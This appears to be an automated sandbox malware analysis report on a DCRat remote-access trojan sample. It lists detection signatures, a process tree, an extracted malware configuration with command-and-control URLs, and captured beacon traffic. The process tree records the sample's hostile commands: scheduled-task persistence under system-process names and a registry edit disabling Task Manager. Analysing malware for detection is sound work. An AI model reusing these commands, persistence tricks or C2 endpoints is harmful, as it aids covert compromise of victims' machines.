Edit tour

Windows Analysis Report
Mj6WEKda85.exe

Overview

General Information

Sample name:	Mj6WEKda85.exe renamed because original name is a hash value
Original sample name:	3A74D8F05D5E7A64227D5521D1EB23AE.exe
Analysis ID:	1583828
MD5:	3a74d8f05d5e7a64227d5521d1eb23ae
SHA1:	46060405cba2d450b32f83af5eeb88afac4a0619
SHA256:	9bb5022b61ea87ba069406c1efc954c254de21483d55147c7ea2a87698b3a1d7
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

Mj6WEKda85.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\Mj6WEKda85.exe" MD5: 3A74D8F05D5E7A64227D5521D1EB23AE)

wscript.exe (PID: 6976 cmdline: "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2836 cmdline: C:\Windows\system32\cmd.exe /c ""C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

driverDhcp.exe (PID: 1520 cmdline: "C:\savesbrokerCrt\driverDhcp.exe" MD5: 5073237558733D40EB37F2616E755ACF)

schtasks.exe (PID: 5268 cmdline: schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKO" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6600 cmdline: schtasks.exe /create /tn "uVyodHPItdaFNnFIblVMLhppqvOTKOu" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5740 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2272 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6512 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows media player\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6496 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4836 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6784 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4268 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 5884 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

RuntimeBroker.exe (PID: 2428 cmdline: "C:\Users\Default\Pictures\RuntimeBroker.exe" MD5: 5073237558733D40EB37F2616E755ACF)

reg.exe (PID: 2876 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

uVyodHPItdaFNnFIblVMLhppqvOTKO.exe (PID: 1996 cmdline: "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe" MD5: 5073237558733D40EB37F2616E755ACF)

uVyodHPItdaFNnFIblVMLhppqvOTKO.exe (PID: 3992 cmdline: "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe" MD5: 5073237558733D40EB37F2616E755ACF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"C\":\"|\",\"Z\":\" \",\"m\":\"-\",\"i\":\"#\",\"k\":\"&\",\"o\":\"$\",\"j\":\"*\",\"T\":\"_\",\"M\":\"^\",\"d\":\")\",\"l\":\"`\",\"v\":\";\",\"S\":\".\",\"R\":\"<\",\"K\":\"%\",\"9\":\"~\",\"A\":\"!\",\"0\":\"(\",\"c\":\",\",\"p\":\"@\",\"X\":\">\"}", "PCRT": "{\"S\":\"!\",\"w\":\"$\",\"p\":\"<\",\"I\":\",\",\"j\":\".\",\"e\":\"`\",\"b\":\")\",\"Q\":\">\",\"i\":\"&\",\"x\":\"#\",\"0\":\"~\",\"c\":\"_\",\"=\":\" \",\"l\":\"@\",\"D\":\"(\",\"y\":\"-\",\"M\":\"%\",\"X\":\"^\",\"6\":\"|\",\"f\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-Kt0j5AP7yjQ6ynOa6sEb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://52952cm.darkproducts.ru/@==gbJBzYuFDT", "H2": "http://52952cm.darkproducts.ru/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000005.00000002.2057566472.00000000033AA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000019.00000002.2194108446.00000000024F4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.2194108446.00000000024B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003674000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000374F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000017.00000002.2148349997.0000000002CED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000033A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000037F3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000035CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000017.00000002.2148349997.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2057566472.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: driverDhcp.exe PID: 1520	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 1996	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 1996	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe PID: 3992	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 2428	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 35 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\Pictures\RuntimeBroker.exe" , CommandLine: "C:\Users\Default\Pictures\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\Pictures\RuntimeBroker.exe, NewProcessName: C:\Users\Default\Pictures\RuntimeBroker.exe, OriginalFileName: C:\Users\Default\Pictures\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4268, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Pictures\RuntimeBroker.exe" , ProcessId: 2428, ProcessName: RuntimeBroker.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\savesbrokerCrt\driverDhcp.exe, ProcessId: 1520, TargetFilename: C:\Users\Default\Pictures\RuntimeBroker.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\Default\Pictures\RuntimeBroker.exe" , CommandLine: "C:\Users\Default\Pictures\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\Pictures\RuntimeBroker.exe, NewProcessName: C:\Users\Default\Pictures\RuntimeBroker.exe, OriginalFileName: C:\Users\Default\Pictures\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4268, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Pictures\RuntimeBroker.exe" , ProcessId: 2428, ProcessName: RuntimeBroker.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Mj6WEKda85.exe", ParentImage: C:\Users\user\Desktop\Mj6WEKda85.exe, ParentProcessId: 2164, ParentProcessName: Mj6WEKda85.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe" , ProcessId: 6976, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\savesbrokerCrt\driverDhcp.exe" , ParentImage: C:\savesbrokerCrt\driverDhcp.exe, ParentProcessId: 1520, ParentProcessName: driverDhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, ProcessId: 6496, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T17:01:59.274949+0100	2034194	1	A Network Trojan was detected	192.168.2.5	49704	104.21.12.142	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T17:02:28.427791+0100	2850862	1	Malware Command and Control Activity Detected	104.21.12.142	80	192.168.2.5	49771	TCP
2025-01-03T17:04:17.833515+0100	2850862	1	Malware Command and Control Activity Detected	104.21.12.142	80	192.168.2.5	49999	TCP
2025-01-03T17:05:26.786925+0100	2850862	1	Malware Command and Control Activity Detected	104.21.12.142	80	192.168.2.5	50011	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mj6WEKda85.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://52952cm.darkproducts.ru/L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ	Avira URL Cloud: Label: malware
Source: http://52952cm.darkproducts.ru/L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv7	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\savesbrokerCrt\driverDhcp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"C\":\"|\",\"Z\":\" \",\"m\":\"-\",\"i\":\"#\",\"k\":\"&\",\"o\":\"$\",\"j\":\"*\",\"T\":\"_\",\"M\":\"^\",\"d\":\")\",\"l\":\"`\",\"v\":\";\",\"S\":\".\",\"R\":\"<\",\"K\":\"%\",\"9\":\"~\",\"A\":\"!\",\"0\":\"(\",\"c\":\",\",\"p\":\"@\",\"X\":\">\"}", "PCRT": "{\"S\":\"!\",\"w\":\"$\",\"p\":\"<\",\"I\":\",\",\"j\":\".\",\"e\":\"`\",\"b\":\")\",\"Q\":\">\",\"i\":\"&\",\"x\":\"#\",\"0\":\"~\",\"c\":\"_\",\"=\":\" \",\"l\":\"@\",\"D\":\"(\",\"y\":\"-\",\"M\":\"%\",\"X\":\"^\",\"6\":\"|\",\"f\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-Kt0j5AP7yjQ6ynOa6sEb", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://52952cm.darkproducts.ru/@==gbJBzYuFDT", "H2": "http://52952cm.darkproducts.ru/@==gbJBzYuFDT", "T": "0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	ReversingLabs: Detection: 75%
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	ReversingLabs: Detection: 75%
Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	ReversingLabs: Detection: 75%
Source: C:\savesbrokerCrt\driverDhcp.exe	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: Mj6WEKda85.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe	Joe Sandbox ML: detected
Source: C:\savesbrokerCrt\driverDhcp.exe	Joe Sandbox ML: detected
Source: C:\Users\Default\Pictures\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Mj6WEKda85.exe

Joe Sandbox ML: detected

Source: Mj6WEKda85.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Mj6WEKda85.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Mj6WEKda85.exe

Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0086A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0086A5F4
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0087B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0087B8E0
Source: C:\Users\user\Desktop\Mj6WEKda85.exe	Code function: 0_2_0088AAA8 FindFirstFileExA,	0_2_0088AAA8

Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\savesbrokerCrt\driverDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49704 -> 104.21.12.142:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 104.21.12.142:80 -> 192.168.2.5:49771
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 104.21.12.142:80 -> 192.168.2.5:49999
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 104.21.12.142:80 -> 192.168.2.5:50011

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://52952cm.darkproducts.ru/@==gbJBzYuFDT

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI5cDMmljY5gDOkFTMmBjYkZzMjdDOiRmZ0UDO5YWZiJzM5QWZ4YWZwIiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
